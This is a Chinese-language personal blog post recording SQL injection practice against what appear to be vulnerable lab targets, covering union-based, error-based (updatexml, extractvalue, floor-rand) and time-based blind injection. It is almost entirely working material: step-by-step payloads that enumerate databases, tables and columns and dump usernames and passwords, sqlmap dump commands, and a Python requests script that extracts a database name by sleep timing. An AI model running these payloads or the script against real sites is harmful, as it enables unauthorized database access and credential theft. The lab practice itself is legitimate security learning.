SCERush's Blog
0%

sql注入实战

发表于 更新于 分类于
本文字数: 7.9k 阅读时长 ≈ 7 分钟

ε=(´ο`*)))唉,太菜了

sql注入都忘完了

union注入

https://rimovni.exeye.run/hugkudure/well

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
1.判断注入
name=1' or 1#

2.判断字段
name=1' order by 5#
name=1' order by 6#

3.union查询
name=-1' union select 1,2,3,4,5#

4.查询数据库、表名
name=-1' union select 1,database(),user(),version(),table_name from information_schema.tables where table_schema='twosecu1_vuln_06' limit 0,1#

5.查询列
name=-1' union select 1,database(),user(),version(),column_name from information_schema.columns where table_schema='twosecu1_vuln_06' and table_name='flag' limit 1,1#

6.查字段
name=-1' union select 1,database(),user(),version(),flag from flag limit 0,2#

报错注入

https://rimovni.exeye.run/mefe/login

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
1.前段验证邮箱
email=1@1.com
passwoed=1

2.post提交,判断注入
email=1' or 1#&password=1

3.判断字段
email=1' order by 3#&password=1
email=1' order by 4#&password=1

4.报错注入
email=1'&password=1

5.爆出数据库
email=1' and updatexml(1,concat(0x7e,database(),0x7e,user()),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,user(),0x7e,database()))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,database(),0x7e,user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

6.爆当前数据库表
email=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

7.爆字段
email=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='twosecu1_vuln_08' and table_name='user'),0x7e),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='twosecu1_vuln_08' and table_name='user'),0x7e))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e)from information_schema.columns where table_schema='twosecu1_vuln_08' and table_name='user' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

8.爆数据库内容
email=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from twosecu1_vuln_08.user)),1)#&password=1
email=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password) from twosecu1_vuln_08.user)))#&password=1
email=1' union select 1,2,3 from (select count(*),concat((select concat(password,0x7e) from twosecu1_vuln_08.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a#&password=1

sql语句注入

https://rimovni.exeye.run/rodka/index

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
1.爆数据库
select length(database());
select substr(database(),1,16);

2.表总数
select count(table_name) from information_schema.tables where table_schema=database();

3.爆数据库表
select length(table_name) from information_schema.tables where table_schema=database() limit 0,1;
select table_name from information_schema.tables where table_schema = database() limit 0,1;

4.爆字段
select count(column_name) from information_schema.columns where table_name='search';
select column_name from information_schema.columns where table_name='search' limit 0,1;

5.爆内容
select concat(one,"---",two,"---",three,"---",four,"---",five) from search limit 0,1;

union注入

https://rimovni.exeye.run/matihe/index?name=one

1
2
3
4
5
6
7
8
9
10
python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one --dbs
python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one -D 'twosecu1_vuln_04' --tables
python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one -D 'twosecu1_vuln_04' -T 'workbook' --columns
python .\sqlmap.py -u https://rimovni.exeye.run/matihe/index?name=one -D 'twosecu1_vuln_04' -T 'workbook' -C 'name' --dump
无法爆出数据,可能是过滤了字符“two”
借助sqlmap手动payload
?name=-1' union select 1,user(),3,database()-- -
?name=-1' union select 1,user(),3,table_name from information_schema.tables where table_schema=database() limit 0,1-- -
?name=-1' union select 1,user(),3,column_name from information_schema.columns where table_schema=database() and table_name='workbook' limit 0,1-- -
?name=-1' union select 1,user(),3,node from workbook limit 5,1-- -

盲注

https://rimovni.exeye.run/fe/login

本来是没有发现是什么注入的,然后用Acunetix扫了一下,发现它给出的payload可以执行,默认好像都是用的sleep函数来进行测试的,然后猜测这个页面为时间盲注,但是怎么构造也不能执行sleep,于是借用Acunetix的payload进行注入

/*'+(select(0)from(select(sleep(5)))v)+'*/

最后爆出数据库 twosecu1_vuln_07 ,数据表 word,use ,字段(两张表一样) id,username,password ,以及数据(word只有一行数据,user好像是无数据) ,test,test

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
1.爆数据库
username=" /*'+(select(1)from(select(sleep(if((length(database())=16),5,0))))v)+'*/&password=1
username=" /*'+(select(1)from(select(sleep(if((ORD(mid(database(),1,1))=116),5,0))))v)+'*/&password=1
twosecu1_vuln_07

2.爆数据库表
username=" /*'+(select(1)from(select(sleep(if(((select count(table_name) from information_schema.tables where table_schema='twosecu1_vuln_07')=2),15,0))))v)+'*/&password=1
username=" /*'+(select(1)from(select(sleep(if((length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=9),15,0))))v)+'*/&password=1
username=\" *'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(table_name) from information_schema.tables where table_schema=database())),%d,1))=%d),15,0))))v)+'*/&password=1
word,user

3.爆字段
uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='user')),%d,1))=%d),15,0))))v)+'*/"&password=1
id,username,password

4.报数据
uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(id) from twosecu1_vuln_07.word)),%d,1))=%d),15,0))))v)+'*/" %(i,j)
1,test,test

爆数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests
import time

def login(_username, _password):
	data = {
		'username':_username,
		'password':_password
	}
	url = "https://rimovni.exeye.run/fe/login"
	print("[+] %s" %url)
	stime = time.time()
	response = requests.post(url, data=data)
	etime = time.time()
	tt = etime - stime
	print("[+] Time: %f" %tt)
	if tt > 10:
		return True
	else:
		return False

def main():
	s = ""
	passwd = "1"
	s_time = time.time()
	# ss = "_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
	ss = "_0123456789abcdefghijklmnopqrstuvwxyz"
	for i in range(1,17):
		# for j in range(33, 127):
		for j in ss:
			uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(database(),%d,1))=%d),10,0))))v)+'*/" %(i,ord(j))
			# print(uname)
			b = login(uname,passwd)
			if b:
				s += j
				print("[*] Brup:" + s)
				break
	e_time = time.time()
	print("[+] Total Time: %f" %(e_time - s_time))

main()
# twosecu1_vuln_07

# table
# uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(table_name) from information_schema.tables where table_schema=database())),%d,1))=%d),15,0))))v)+'*/" %(i,ord(j))

# column
# uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='word')),%d,1))=%d),15,0))))v)+'*/" %(i,ord(j))

# data
# uname = "\" /*'+(select(1)from(select(sleep(if((ORD(mid(((select username from twosecu1_vuln_07.word limit 0,1)),%d,1))=%d),15,0))))v)+'*/" %(i,j)